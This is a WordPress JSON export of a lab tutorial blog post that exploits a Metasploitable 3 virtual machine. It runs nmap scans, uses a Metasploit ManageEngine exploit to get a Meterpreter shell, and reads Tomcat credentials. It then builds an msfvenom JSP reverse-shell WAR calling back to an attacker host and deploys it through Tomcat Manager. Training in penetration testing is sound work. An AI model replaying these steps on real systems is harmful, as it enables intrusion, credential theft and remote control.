{"id":568,"date":"2024-06-15T04:47:17","date_gmt":"2024-06-15T04:47:17","guid":{"rendered":"https:\/\/hackmybox.com\/?p=568"},"modified":"2024-08-15T07:05:56","modified_gmt":"2024-08-15T07:05:56","slug":"building-your-own-pentest-box-part-3-ethical-hacking-exploitation-with-metasploit","status":"publish","type":"post","link":"https:\/\/hackmybox.com\/index.php\/2024\/06\/15\/building-your-own-pentest-box-part-3-ethical-hacking-exploitation-with-metasploit\/","title":{"rendered":"Building Your Own Pentest Box: Part 3 \u2013  Ethical Hacking (Exploitation with Metasploit )"},"content":{"rendered":"\n<p><strong>Important Disclaimer: Using these modules for anything other than testing on a system you have permission to exploit is illegal and unethical.<\/strong> <\/p>\n\n\n\n<p>1.The <code class=\"\">nmap -sP<\/code> command in Nmap is used for performing a <strong>ping sweep<\/strong>. Ping sweep is a technique used to identify active hosts on a network.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"568\" height=\"192\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-39.png\" alt=\"\" class=\"wp-image-626\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-39.png 568w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-39-300x101.png 300w\" sizes=\"auto, (max-width: 568px) 100vw, 568px\" \/><\/figure>\n\n\n\n<p>2. The <code class=\"\">nmap -sV<\/code> command in Nmap is used for performing a basic <strong>service version scan<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"731\" height=\"565\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-42.png\" alt=\"\" class=\"wp-image-629\" style=\"width:670px;height:auto\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-42.png 731w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-42-300x232.png 300w\" sizes=\"auto, (max-width: 731px) 100vw, 731px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"672\" height=\"304\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-41.png\" alt=\"\" class=\"wp-image-628\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-41.png 672w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-41-300x136.png 300w\" sizes=\"auto, (max-width: 672px) 100vw, 672px\" \/><\/figure>\n\n\n\n<p>This provides more information about the target, Metasploitable 3 (10.0.2.5), compared to a simple ping sweep (nmap -sP). It reveals:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Open ports on the target devices.<\/li>\n\n\n\n<li>The application or service likely running on those ports<\/li>\n<\/ul>\n\n\n\n<p>3. Metasploit includes modules for both exploiting and gathering information about ManageEngine Desktop Central. These modules would allow you to potentially take control or compromise a vulnerable system. &#8220;<strong>search manageengine desktop<\/strong>&#8221; This will return a list of modules related to ManageEngine Desktop Central.<\/p>\n\n\n\n<p>&#8220;<strong>use 1<\/strong>&#8221;  This specifies the exploit module you want to use e<code class=\"\">xploit\/windows\/http\/manageengine_conncetionid_write<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"782\" height=\"558\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-44.png\" alt=\"\" class=\"wp-image-631\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-44.png 782w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-44-300x214.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-44-768x548.png 768w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>4. In Metasploit, the concept of &#8220;options&#8221; refers to the configurable settings that can be adjusted for a particular exploit module, auxiliary module, payload, or encoder. These options allow you to fine-tune the module&#8217;s behavior to suit your specific needs during a penetration testing engagement.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"774\" height=\"507\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-45.png\" alt=\"\" class=\"wp-image-632\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-45.png 774w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-45-300x197.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-45-768x503.png 768w\" sizes=\"auto, (max-width: 774px) 100vw, 774px\" \/><\/figure>\n\n\n\n<p>5. <code class=\"\">set &lt;option_name&gt; &lt;value&gt;<\/code>: This command sets the value of a specific option. For example, <code class=\"\">set RHOST 10.0.2.5<\/code> sets the target IP address (RHOST) to 10.0.2.5. Enter &#8220;execute&#8221; to run the module.<\/p>\n\n\n\n<p>You&#8217;ve successfully established a connection with a target system using a Meterpreter payload in Metasploit.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"775\" height=\"327\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-46.png\" alt=\"\" class=\"wp-image-633\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-46.png 775w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-46-300x127.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-46-768x324.png 768w\" sizes=\"auto, (max-width: 775px) 100vw, 775px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>6. This command instructs the Meterpreter session to execute a program or command on the target system. &#8221; <strong><code>-f cmd.exe<\/code> -i &#8221; <\/strong> specifies the program to execute, which is <code class=\"\">cmd.exe<\/code> (the Windows command prompt). &#8221; <\/p>\n\n\n\n<p>&#8220;NT AUTHORITY\\LocalService&#8221; indicates that the command was executed under the LocalService account on the target system.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"636\" height=\"262\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-47.png\" alt=\"\" class=\"wp-image-634\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-47.png 636w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-47-300x124.png 300w\" sizes=\"auto, (max-width: 636px) 100vw, 636px\" \/><\/figure>\n\n\n\n<p>7. Navigate to the directory as seen below.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"755\" height=\"362\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-11.png\" alt=\"\" class=\"wp-image-580\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-11.png 755w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-11-300x144.png 300w\" sizes=\"auto, (max-width: 755px) 100vw, 755px\" \/><\/figure>\n\n\n\n<p>8. Enter type command to view content of tomcat-users.xml<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"791\" height=\"305\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-12.png\" alt=\"\" class=\"wp-image-581\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-12.png 791w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-12-300x116.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-12-768x296.png 768w\" sizes=\"auto, (max-width: 791px) 100vw, 791px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>9. As per result you can see username below.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"671\" height=\"551\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-48.png\" alt=\"\" class=\"wp-image-635\" style=\"width:624px;height:auto\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-48.png 671w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-48-300x246.png 300w\" sizes=\"auto, (max-width: 671px) 100vw, 671px\" \/><\/figure>\n\n\n\n<p>10. Also you can run netstat to view  details about active connections.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"623\" height=\"555\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-14.png\" alt=\"\" class=\"wp-image-583\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-14.png 623w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-14-300x267.png 300w\" sizes=\"auto, (max-width: 623px) 100vw, 623px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"644\" height=\"529\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-15.png\" alt=\"\" class=\"wp-image-584\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-15.png 644w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-15-300x246.png 300w\" sizes=\"auto, (max-width: 644px) 100vw, 644px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>11. Back to Metasploit create file using command below:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"676\" height=\"161\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-30.png\" alt=\"\" class=\"wp-image-614\" style=\"width:646px;height:auto\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-30.png 676w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-30-300x71.png 300w\" sizes=\"auto, (max-width: 676px) 100vw, 676px\" \/><\/figure>\n\n\n\n<p><strong>How the Command Works:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong><code>msfvenom<\/code>:<\/strong> This is a tool within Metasploit that generates various payloads, including exploit code.<\/li>\n\n\n\n<li><strong><code>-p java\/jsp_shell_reverse_tcp<\/code>:<\/strong> This specifies the payload type, which is a Java JSP shell configured for reverse TCP connection.<\/li>\n\n\n\n<li><strong><code>LHOST=10.0.2.4<\/code>:<\/strong> This sets the local host IP address (your attacking machine) where the payload will attempt to connect back.<\/li>\n\n\n\n<li><strong><code>LPORT=4445<\/code>:<\/strong> This defines the local port on your attacking machine where you&#8217;ll listen for the incoming connection from the compromised system.<\/li>\n\n\n\n<li><strong><code>-f war<\/code>:<\/strong> This specifies the output format as a WAR file, which is a web application archive commonly used in Java web servers like Tomcat.<\/li>\n\n\n\n<li><strong><code>> malicious.war<\/code>:<\/strong> This redirects the generated WAR file to a file named <code class=\"\">malicious.war<\/code><\/li>\n<\/ul>\n\n\n\n<p>12.  Open a web browser and navigate to the target machine&#8217;s address on port <strong>8282<\/strong>, where Tomcat is likely running . We identified this port during the Nmap scan in step 2. Click on &#8220;Manger App&#8221;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"777\" height=\"529\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-16.png\" alt=\"\" class=\"wp-image-585\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-16.png 777w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-16-300x204.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-16-768x523.png 768w\" sizes=\"auto, (max-width: 777px) 100vw, 777px\" \/><\/figure>\n\n\n\n<p>13. Enter username and password obtained from step 9.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"786\" height=\"554\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-21.png\" alt=\"\" class=\"wp-image-590\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-21.png 786w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-21-300x211.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-21-768x541.png 768w\" sizes=\"auto, (max-width: 786px) 100vw, 786px\" \/><\/figure>\n\n\n\n<p>13. Now upload the war file created on step 11. Then the malicious file will be uploaded and deployed to acquire a remote shell<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"780\" height=\"513\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-23.png\" alt=\"\" class=\"wp-image-592\" style=\"width:840px;height:auto\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-23.png 780w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-23-300x197.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-23-768x505.png 768w\" sizes=\"auto, (max-width: 780px) 100vw, 780px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"784\" height=\"557\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-24.png\" alt=\"\" class=\"wp-image-593\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-24.png 784w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-24-300x213.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-24-768x546.png 768w\" sizes=\"auto, (max-width: 784px) 100vw, 784px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"784\" height=\"545\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-25.png\" alt=\"\" class=\"wp-image-594\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-25.png 784w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-25-300x209.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-25-768x534.png 768w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-25-590x410.png 590w\" sizes=\"auto, (max-width: 784px) 100vw, 784px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>14. The <code class=\"\">exploit\/multi\/handler<\/code> module in Metasploit is a generic payload handle.<\/p>\n\n\n\n<p>Open a browser  on attacker machine (Kali) enter http:\/\/10.0.2.5:8282\/malicious . Shell banner will appear once successful.<\/p>\n\n\n\n<p>For more details about reverse shell see link below:<\/p>\n\n\n\n<p><a href=\"https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/how-to-use-a-reverse-shell-in-metasploit.html\">https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/how-to-use-a-reverse-shell-in-metasploit.htm<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"783\" height=\"553\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-49.png\" alt=\"\" class=\"wp-image-636\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-49.png 783w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-49-300x212.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-49-768x542.png 768w\" sizes=\"auto, (max-width: 783px) 100vw, 783px\" \/><\/figure>\n\n\n\n<p>15. Reference:<\/p>\n\n\n\n<p><a href=\"https:\/\/era.library.ualberta.ca\/items\/ada5c209-9f7c-4406-bddb-656821859523\">https:\/\/era.library.ualberta.ca\/items\/ada5c209-9f7c-4406-bddb-656821859523<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.offsec.com\/metasploit-unleashed\/\">https:\/\/www.offsec.com\/metasploit-unleashed\/<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/docs.metasploit.com\/\">https:\/\/docs.metasploit.com\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Important Disclaimer: Using these modules for anything other than testing on a system you have permission to exploit is illegal and unethical. 1.The nmap -sP command in Nmap is used for performing a ping sweep. Ping sweep is a technique used to identify active hosts on a network. 2. The nmap -sV command in Nmap [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":787,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","site-transparent-header":"default","prose-style":"enable","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[12],"tags":[],"class_list":["post-568","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/posts\/568","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/comments?post=568"}],"version-history":[{"count":15,"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/posts\/568\/revisions"}],"predecessor-version":[{"id":655,"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/posts\/568\/revisions\/655"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/media\/787"}],"wp:attachment":[{"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/media?parent=568"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/categories?post=568"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/tags?post=568"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}